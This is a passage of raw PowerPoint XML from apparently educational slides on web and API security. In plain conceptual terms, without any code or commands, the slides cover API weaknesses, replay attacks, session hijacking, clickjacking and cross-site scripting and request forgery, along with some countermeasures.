              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{406CBE2C-F72B-DF3C-986E-10B2DDAB1C19}"/>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id="{78943E22-F20A-8DE2-AD2F-591C2F0D59B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40AA8794-46E9-04F1-E9C9-7FDE549002BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261579" y="877987"/>
            <a:ext cx="8616261" cy="2954655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some other common attacks against APIs target the following weaknesses and vulnerabilities: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Ineffective secrets management, allowing threat actors to discover an API key and perform any action authorized to that key. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Lack of input validation, allowing the threat actor to insert arbitrary parameters into API methods and queries. This is often referred to as allowing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> input. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Error messages revealing clues to a potential adversary. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>For example, an authentication error should not reveal whether a valid username has been rejected because of an invalid password. The error should simply indicate an authentication failure. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Denial of service (DoS) by bombarding the API with spurious calls. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3027857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E905-0555-4ABB-BF1D-633A652FBB5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replay Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4534B4FC-DCD4-48AB-9CE4-EB39BED3044A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341927" y="968992"/>
            <a:ext cx="8645778" cy="1473664"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A replay attack is a form of network attack in which valid data transmission is maliciously or fraudulently repeated or delayed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A replay attack works by sniffing or guessing the token value and then submitting it to re-establish the session illegitimately</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9455E794-5A9F-4A19-B2A3-B66ED952166D}"/>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id="{06BA7ABE-6EBD-4923-8BC3-FA65A70E340F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3606905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GB" dirty="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242648" y="708660"/>
            <a:ext cx="4172597" cy="3826764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side/cross-site (CSRF/XSRF) request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passes a URL to another site where the user has an authenticated session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session hijacking most often means replaying a cookie in some way. Attackers can sniff network traffic to obtain session cookies sent over an unsecured network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To counter cookie hijacking, you can encrypt cookies during transmission, delete cookies from the client's browser cache when the client terminates the session, and design your web app to deliver a new cookie with each new session between the app and the client's browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DAE8991-CEFB-4A17-8FBF-3555F7BE497A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023360" y="871269"/>
            <a:ext cx="4774566" cy="2984103"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{965BAE89-EAA2-4F8C-BF26-B21A4FABB995}"/>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id="{87064CA6-E5FB-4FD6-A413-A8B3536532BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71DFD4FE-5960-4D95-8FED-DEA5378FBD78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7914937" y="4156815"/>
            <a:ext cx="1285929" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Images © 123rf.com.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="658560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41927" y="59526"/>
            <a:ext cx="8455567" cy="633458"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add invisible layer to intercept/redirect click events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking is an attack where what the user sees and trusts as a web application with some sort of login page or form contains a malicious layer or invisible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that allows an attacker to intercept or redirect user input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE82221-1AC8-4F4A-847F-D10086E7C244}"/>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id="{D677CD3F-A1B4-4FBB-A484-1922448A0768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1024071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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="980349"/>
            <a:ext cx="4316340" cy="3322145"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Attacker injects code in trusted site that will be executed in client browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A client-side or cross-site request forgery (CSRF or XSRF) can exploit applications that use cookies to authenticate users and track sessions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>The attacker must convince the victim to start a session with the target site. The attacker must then pass an HTTP request to the victim's browser that spoofs an action on the target site</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B088B7-46D5-49D7-A345-C4E6D1BD33B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5130133" y="2854888"/>
            <a:ext cx="3953485" cy="1477328"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-342900" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="857250" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1200150" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1350"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1543050" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1350"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1885950" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2228850" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2571750" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2914650" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8895636B-2756-4B7B-89FA-43DBAC0CD6AA}"/>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id="{BC06BCD9-F2D7-4408-8F13-3D6A04D87257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2606EB17-59C9-4F29-A871-DE445CB793C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138759" y="841006"/>
            <a:ext cx="3953485" cy="1477328"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="762402208">
                  <ask:type>
                    <ask:lineSketchNone/>
                  </ask:type>
                </ask:lineSketchStyleProps>
              </a:ext>
            </a:extLst>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-342900" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="857250" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1200150" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1350"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1543050" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1350"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1885950" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2228850" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2571750" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2914650" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A761A35E-EFB7-46D7-8C59-B05AB3CF0F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4658266" y="811284"/>
            <a:ext cx="4339748" cy="1523153"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4339748"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1523153"/>
              <a:gd name="connsiteX1" fmla="*/ 585866 w 4339748"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1523153"/>
              <a:gd name="connsiteX2" fmla="*/ 1171732 w 4339748"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1523153"/>
              <a:gd name="connsiteX3" fmla="*/ 1584008 w 4339748"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1523153"/>
              <a:gd name="connsiteX4" fmla="*/ 2213271 w 4339748"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1523153"/>
              <a:gd name="connsiteX5" fmla="*/ 2625548 w 4339748"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1523153"/>
              <a:gd name="connsiteX6" fmla="*/ 3254811 w 4339748"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1523153"/>
              <a:gd name="connsiteX7" fmla="*/ 3797280 w 4339748"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1523153"/>
              <a:gd name="connsiteX8" fmla="*/ 4339748 w 4339748"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1523153"/>
              <a:gd name="connsiteX9" fmla="*/ 4339748 w 4339748"/>
              <a:gd name="connsiteY9" fmla="*/ 462023 h 1523153"/>
              <a:gd name="connsiteX10" fmla="*/ 4339748 w 4339748"/>
              <a:gd name="connsiteY10" fmla="*/ 924046 h 1523153"/>
              <a:gd name="connsiteX11" fmla="*/ 4339748 w 4339748"/>
              <a:gd name="connsiteY11" fmla="*/ 1523153 h 1523153"/>
              <a:gd name="connsiteX12" fmla="*/ 3753882 w 4339748"/>
              <a:gd name="connsiteY12" fmla="*/ 1523153 h 1523153"/>
              <a:gd name="connsiteX13" fmla="*/ 3211414 w 4339748"/>
              <a:gd name="connsiteY13" fmla="*/ 1523153 h 1523153"/>
              <a:gd name="connsiteX14" fmla="*/ 2712343 w 4339748"/>
              <a:gd name="connsiteY14" fmla="*/ 1523153 h 1523153"/>
              <a:gd name="connsiteX15" fmla="*/ 2126477 w 4339748"/>
              <a:gd name="connsiteY15" fmla="*/ 1523153 h 1523153"/>
              <a:gd name="connsiteX16" fmla="*/ 1670803 w 4339748"/>
